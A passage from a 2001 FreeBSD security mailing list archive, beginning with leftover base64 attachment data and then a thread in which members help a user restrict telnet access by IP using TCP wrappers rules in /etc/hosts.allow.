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 ------=_NextPart_000_000A_01C15CD4.D549F2E0-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 24 22: 7:16 2001 Delivered-To: freebsd-security@freebsd.org Received: from loverboy.highspeedweb.net (loverboy.highspeedweb.net [204.181.12.40]) by hub.freebsd.org (Postfix) with SMTP id 43BA137B403 for ; Wed, 24 Oct 2001 22:07:09 -0700 (PDT) Received: (qmail 13254 invoked by uid 510); 25 Oct 2001 05:07:00 -0000 Received: from unknown (HELO padjajaran) (202.150.91.162) by progs4wealth.com with SMTP; 25 Oct 2001 05:07:00 -0000 Message-ID: <00c601c15d13$8dd17200$ab5b96ca@padjajaran> From: "Purwa Riadi" To: "David" , References: <20011023081729.A10955@warsaw.scl.ameslab.gov> <007c01c15c6b$5a861fc0$ab5b96ca@padjajaran> <000701c15c6c$5271d620$0900000a@web.cc> Subject: Re: telnet limitation Date: Thu, 25 Oct 2001 12:11:36 +0700 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: 
List-Unsubscribe: X-Loop: FreeBSD.org

I tried to set the hosts.deny and hosts.allow like below

#more /etc/hosts.allow
ALL : 127.0.0.1 localhost
ALL : 202.159.35.125
ALL : 202.159.35.126

# more /etc/hosts.deny
ALL : ALL

But I can still telnet from all of the hosts in my network. The rules in both files didn't have any impact at all on my machine (3.3-RELEASE FreeBSD 3.3-RELEASE).
What should I do now....?

Also, if I wanna upgrade the server to 4.3-Release... Is it a safe way for my data and settings like the natd setting?

Thx and regards

Purwa R

----- Original Message -----
From: "David"
To: "Purwa Riadi" ;
Sent: Wednesday, October 24, 2001 4:14 PM
Subject: Re: telnet limitation

> hi,
>
> try using tcp wrappers.. it is built into FreeBSD.
> look at hosts.allow
>
> ----- Original Message -----
> From: "Purwa Riadi"
> To:
> Sent: Wednesday, October 24, 2001 5:07 PM
> Subject: telnet limitation
>
>
> > Dear FreeBSDer,
> >
> > If I wanna give rules in my server, so that just certain IPs can
> > telnet to my server, what scripts should I change and configure?
> > Can anyone explain to me?
> >
> > thx & regards
> >
> > Purwa
> >
> > To Unsubscribe: send mail to majordomo@FreeBSD.org
> > with "unsubscribe freebsd-security" in the body of the message
> >

From owner-freebsd-security Wed Oct 24 22:21:49 2001
Delivered-To: freebsd-security@freebsd.org
Received: from science.slc.edu (Science.SLC.Edu [198.83.6.248]) by hub.freebsd.org (Postfix) with ESMTP id 3C0E037B403 for ; Wed, 24 Oct 2001 22:21:42 -0700 (PDT)
Received: (from aschneid@localhost) by science.slc.edu (8.11.0/8.11.0) id f9P5JcX01331; Thu, 25 Oct 2001 01:19:38 -0400 (EDT) (envelope-from aschneid)
Date: Thu, 25 Oct 2001 01:19:38 -0400
From: Anthony Schneider
To: Purwa Riadi
Cc: David , freebsd-security@FreeBSD.ORG
Subject: Re: telnet limitation
Message-ID: <20011025011938.A1299@mail.slc.edu>
References: <20011023081729.A10955@warsaw.scl.ameslab.gov> <007c01c15c6b$5a861fc0$ab5b96ca@padjajaran> <000701c15c6c$5271d620$0900000a@web.cc> <00c601c15d13$8dd17200$ab5b96ca@padjajaran>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <00c601c15d13$8dd17200$ab5b96ca@padjajaran>; from purwa@progs4wealth.com on Thu, Oct 25, 2001 at 12:11:36PM +0700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

I believe that the hosts.deny file is deprecated, and that rules should now be specified in /etc/hosts.allow.
This is a 3.3-RELEASE box we're talking about, which I'm not too sure of, but you can specify IP addresses which can access telnet on your host by specifying rules in your /etc/hosts.allow file such as:

ALL : 127.0.0.1 : allow
telnetd : 202.169.35.125 : allow
ALL : ALL : deny

What this effectively does is allow all connections from localhost to localhost for any service, and deny everything for every host except for 202.159.35.125 accessing telnetd.
-Anthony.

On Thu, Oct 25, 2001 at 12:11:36PM +0700, Purwa Riadi wrote:
>
> I tried to set the hosts.deny and hosts.allow like below
>
> #more /etc/hosts.allow
> ALL: 127.0.0.1 localhost
> ALL: 202.159.35.125
> ALL: 202.159.35.126
>
> # more /etc/hosts.deny
> ALL: ALL
>
> But I can still telnet from all of the hosts in my network. The rules in both
> files didn't have any impact at all on my machine (3.3-RELEASE FreeBSD
> 3.3-RELEASE).
> What should I do now....?
>
> Also, if I wanna upgrade the server to 4.3-Release... Is it a safe way for my
> data and settings like the natd setting?
>
> Thx and regards
>
> Purwa R
>
>
> ----- Original Message -----
> From: "David"
> To: "Purwa Riadi" ;
> Sent: Wednesday, October 24, 2001 4:14 PM
> Subject: Re: telnet limitation
>
>
> > hi,
> >
> > try using tcp wrappers.. it is built into FreeBSD.
> > look at hosts.allow
> >
> > ----- Original Message -----
> > From: "Purwa Riadi"
> > To:
> > Sent: Wednesday, October 24, 2001 5:07 PM
> > Subject: telnet limitation
> >
> >
> > > Dear FreeBSDer,
> > >
> > > If I wanna give rules in my server, so that just certain IPs can
> > > telnet to my server, what scripts should I change and configure?
> > > Can anyone explain to me?
> > >
> > >
> > > thx & regards
> > >
> > > Purwa

From owner-freebsd-security Wed Oct 24 23:28:16 2001
Delivered-To: freebsd-security@freebsd.org
Received: from science.slc.edu (Science.SLC.Edu [198.83.6.248]) by hub.freebsd.org (Postfix) with ESMTP id B599E37B406 for ; Wed, 24 Oct 2001 23:27:53 -0700 (PDT)
Received: (from aschneid@localhost) by science.slc.edu (8.11.0/8.11.0) id f9P6Qke02055; Thu, 25 Oct 2001 02:26:46 -0400 (EDT) (envelope-from aschneid)
Date: Thu, 25 Oct 2001 02:26:46 -0400
From: Anthony Schneider
To: Purwa Riadi
Cc: freebsd-security@freebsd.org
Subject: Re: telnet limitation
Message-ID: <20011025022646.A2029@mail.slc.edu>
References: <20011023081729.A10955@warsaw.scl.ameslab.gov> <007c01c15c6b$5a861fc0$ab5b96ca@padjajaran> <000701c15c6c$5271d620$0900000a@web.cc> <00c601c15d13$8dd17200$ab5b96ca@padjajaran> <20011025011938.A1299@mail.slc.edu> <00dd01c15d1d$f5b55120$ab5b96ca@padjajaran>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <00dd01c15d1d$f5b55120$ab5b96ca@padjajaran>; from purwa@progs4wealth.com on Thu, Oct 25, 2001 at 01:26:13PM +0700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I'm not sure how to go about logging connections to telnetd.
Perhaps someone else here knows.
-Anthony.

On Thu, Oct 25, 2001 at 01:26:13PM +0700, Purwa Riadi wrote:
> Dear Anthony,
>
> Thanks for your advice, and now the rules is working in my machine. telnetd
> is the key that make setting true....
> Also,can I ask again :-)
> Where is the location of log file telnet? So, I can know who try to telnet
> to my machine.
>
> thx & rgds
>
> Purwa
>
>
>
> ----- Original Message -----
> From: "Anthony Schneider"
> To: "Purwa Riadi"
> Cc: "David" ;
> Sent: Thursday, October 25, 2001 12:19 PM
> Subject: Re: telnet limitation
>
>
> > I believe that the hosts.deny file is deprecated, and that rules should now be
> > specified in /etc/hosts.allow. This is a 3.3-RELEASE box we're talking about,
> > which I'm not too sure of, but you can specify IP addresses which can access
> > telnet on your host by specifying rules in your /etc/hosts.allow file such as:
> >
> > ALL : 127.0.0.1 : allow
> > telnetd : 202.169.35.125 : allow
> > ALL : ALL : deny
> >
> > What this effectively does is allow all connections from localhost to localhost
> > for any service, and deny everything for every host except for 202.159.35.125
> > accessing telnetd.
> > -Anthony.
> >
> > On Thu, Oct 25, 2001 at 12:11:36PM +0700, Purwa Riadi wrote:
> > >
> > > I was try to set the hosts.deny and hosts.allow like below
> > >
> > > #more /etc/hosts.allow
> > > ALL: 127.0.0.1 localhost
> > > ALL: 202.159.35.125
> > > ALL: 202.159.35.126
> > >
> > > # more /etc/hosts.deny
> > > ALL: ALL
> > >
> > > But, I can still telnet from all of host in my network. The rules in both of
> > > file didn't give impact at all for my machine(3.3-RELEASE FreeBSD
> > > 3.3-RELEASE).
> > > What should I do now....?
> > >
> > > Also, if I wanna upgrade the server to 4.3-Release...Is it safe way for my
> > > data and setting like natd setting?
> > >
> > > Thx and regards
> > >
> > > Purwa R
> > >
> > >
> > > ----- Original Message -----
> > > From: "David"
> > > To: "Purwa Riadi" ;
> > > Sent: Wednesday, October 24, 2001 4:14 PM
> > > Subject: Re: telnet limitation
> > >
> > >
> > > > hi,
> > > >
> > > > try using tcp wrappers.. it is built into FreeBSD.
> > > > look at hosts.allow
> > > >
> > > > ----- Original Message -----
> > > > From: "Purwa Riadi"
> > > > To:
> > > > Sent: Wednesday, October 24, 2001 5:07 PM
> > > > Subject: telnet limitation
> > > >
> > > >
> > > > > Dear FreeBSDer,
> > > > >
> > > > > If I wanna give rules in my server, therefore just certain IP that can
> > > > > telnet to my server, whats scripts that should I change and configure?
> > > > > Anyone can explain to me?
> > > > >
> > > > >
> > > > > thx & regards
> > > > >
> > > > > Purwa

From owner-freebsd-security Wed Oct 24 23:33:35 2001
Delivered-To: freebsd-security@freebsd.org
Received: from R181172.resnet.ucsb.edu (R181172.resnet.ucsb.edu [128.111.181.172]) by hub.freebsd.org (Postfix) with ESMTP id 088AC37B405 for ; Wed, 24 Oct 2001 23:33:33 -0700 (PDT)
Received: from localhost (mudman@localhost) by R181172.resnet.ucsb.edu (8.11.6/8.11.6) with ESMTP id f9P6aGN18005 for ; Wed, 24 Oct 2001 23:36:16 -0700 (PDT) (envelope-from mudman@R181172.resnet.ucsb.edu)
Date: Wed, 24 Oct 2001 23:36:16 -0700 (PDT)
From: Dave
To:
Subject: lowering uids, startup
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

